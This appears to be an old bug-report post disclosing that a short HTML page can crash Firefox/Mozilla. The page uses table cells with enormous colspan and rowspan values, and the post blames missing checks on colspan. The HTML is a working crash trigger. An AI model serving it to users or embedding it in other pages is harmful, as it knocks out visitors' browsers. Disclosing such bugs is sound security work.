[bug]these codes can crash firefox/mozilla

    Bellow codes can crash firefox/mozilla
    > <html>
    > <head>
    > <title> test </title>
    > </head>
    > <body>
    > <table>
    > <tr>
    > <td> one </td>
    > <td colspan="200" rowspan="121237"> two </td>
    > <td colspan="20000" rowspan="121237"> Three </td>
    > </tr>
    > <table>
    > </body>
    > </html>


    because firefox/mozilla don't check the value of colspan
